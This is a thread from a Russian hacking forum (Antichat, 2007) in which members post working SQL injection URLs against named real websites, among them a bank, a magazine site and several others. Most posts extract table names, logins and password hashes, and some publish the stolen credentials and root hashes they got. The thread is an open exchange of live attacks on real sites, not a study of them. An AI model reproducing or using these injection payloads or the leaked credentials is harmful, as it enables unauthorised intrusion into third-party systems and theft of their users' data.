HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3141  
Старый 22.09.2007, 17:09
c001er*
Познающий
Регистрация: 15.06.2007
Сообщений: 39
С нами:
262630

Репутация: 20
По умолчанию

http://www.sgbank.ru/news.asp?news_id=1+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT +IN+('bankdel','bankseek','cbr','currency_exch','c urrency_opt','currency_zayavka','doc_req','documen ts','dtproperties','forums','keybaseb','keybasef', 'messages','news1'))--
baser192:12345
 
Ответить с цитированием

  #3142  
Старый 22.09.2007, 17:56
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
9254548

Репутация: 1942


По умолчанию

Google Page Rank 8/10
WebAlta WTR 9/10


4-ая версия..

логин+пароль:

Код:
http://www.mnogosearch.org/bugs/bugs.php?id=-1+union+select+1,2,pass,4,5,6,7,8,9,user,11,12,13,14,15,16+from+user/*
логин:
bar
хэш пасса:
948f878a52bb69d5e54fe8d04dcddfd5

Последний раз редактировалось BlackCats; 22.09.2007 в 18:08..
 
Ответить с цитированием

  #3143  
Старый 22.09.2007, 17:59
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
С нами:
2360904

Репутация: 1393


По умолчанию

Код:
http://www.concertseries.org/index.php?page=-1+union+select+0,1,2,3,4,version(),user(),7,8,9,10,11,12,13,15,17,18,19,20/*
 
Ответить с цитированием

  #3144  
Старый 22.09.2007, 18:09
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
С нами:
1292655

Репутация: 168
По умолчанию

Цитата:
Сообщение от _-Ramos-_  
www.chip.ua - сайт журнала CHIP

Код:
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Скуль так розкрутить не удалось =\

P.S: _http://www.ichip.ru/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
тот же результат =)
___http://www.chip.ua/?page=poll&id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13+from+information_schema.tables+limit+16,1/*
 
Ответить с цитированием

  #3145  
Старый 22.09.2007, 18:23
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
9254548

Репутация: 1942


По умолчанию

Цитата:
Сообщение от _-Ramos-_  
www.chip.ua - сайт журнала CHIP

Код:
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Скуль так розкрутить не удалось =\

P.S: _http://www.ichip.ru/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
тот же результат =)
все таблички:
Код:
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES/*
все колонки:
Код:
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13+from+INFOrMATION_SCHEMA.COLUMNS/*
 
Ответить с цитированием

  #3146  
Старый 22.09.2007, 18:30
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
9254548

Репутация: 1942


По умолчанию

Цитата:
Сообщение от z01b  
Код:
http://www.northberwickuk.com/info.php?id=-1+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27/*&catid=324&f=NorthBerwick&type=featured
пасс: test.. логина не нашёл.. предполагаю что тоже test
Код:
http://www.northberwickuk.com/info.php?id=-1+union+select+0,password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27+from+user/*&catid=324&f=NorthBerwick&type=featured
 
Ответить с цитированием

  #3147  
Старый 22.09.2007, 19:00
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
С нами:
2360904

Репутация: 1393


По умолчанию

Код:
http://www.sbinstitute.com/news.php?id=-1+union+select+0,concat(user,char(58),password),user,3,4+from+mysql.user/*
root:18846f503afd5707

Второй рут за сегодня )
К сожаленью пасс расшифровать не удалось (
 
Ответить с цитированием

  #3148  
Старый 22.09.2007, 21:11
valiko
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
С нами:
1237085

Репутация: 452
По умолчанию

Код:
http://www.reporterdiario.com.br/index.php=3fid=3d-33150'+union+select+1,user(),database(),version(),5,6,7,8,9,10,11/*
 
Ответить с цитированием

  #3149  
Старый 22.09.2007, 21:33
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
17668503

Репутация: 5826


По умолчанию

https://forum.antichat.ru/showpost.php?p=340659&postcount=1987

Цитата:
Сообщение от BlackCats  
Цитата:
http://www.mnogosearch.org/bugs/bugs.php?id=21+order+by+16
9898
https://forum.antichat.ru/showpost.php?p=465643&postcount=3174

Цитата:
Сообщение от BlackCats  
Google Page Rank 8/10
WebAlta WTR 9/10


4-ая версия..

логин+пароль:

Код:
http://www.mnogosearch.org/bugs/bugs.php?id=-1+union+select+1,2,pass,4,5,6,7,8,9,user,11,12,13,14,15,16+from+user/*
логин:
bar
хэш пасса:
948f878a52bb69d5e54fe8d04dcddfd5
Классно, можно выкладывать раз по 10, так наверное эффективнее (репы больше и т.д.) получится?
 
Ответить с цитированием

  #3150  
Старый 23.09.2007, 00:36
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
С нами:
1292655

Репутация: 168
По умолчанию

___http://kino.ukr.net/i/nw.php?t=nologo&f=&id=4897999+uNioN+seLect+concat( login,0x3a,passw),null,null,null,null+from+users+l imit+6,1/*&mid=1345
результат в исходниках страницы
version() 5.0.18
user() afisha@10.60.20.5
database() afisha
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.